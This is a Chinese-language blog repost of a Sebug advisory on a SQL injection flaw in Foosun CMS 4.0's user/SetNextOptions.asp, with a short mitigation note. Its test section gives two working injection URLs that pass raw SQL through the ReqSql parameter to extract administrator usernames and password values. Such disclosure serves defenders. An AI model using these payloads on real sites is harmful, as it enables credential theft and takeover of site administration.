风讯4.0 user/SetNextOptions.asp sql注入漏洞

2010年1月23日星期六 | | |

风讯4.0 user/SetNextOptions.asp sql注入漏洞

SSV ID:15183
SEBUG-Appdir:风讯(foosun)
发布时间:2009-12-12
影响版本:
风讯4.0
漏洞描述:
/user/SetNextOptions.asp中对用户数据验证不严,存在sql注入漏洞。  
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
构造注入  user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin"admin_name"管理用户名数据库表    user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin"admin_pass_word"管理密码数据库表
SEBUG安全建议:
SEBUG临时解决办法:  对ReqSql参数进行过滤    请参考官方补丁
// sebug.net [2010-01-05]
我的QQ空间
SafeCms <= 2.0.1.0 Beta Cross Site Scripting
SSV ID:15203发布时间:2010-01-07测试方法:[www.sebug.net]本站...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]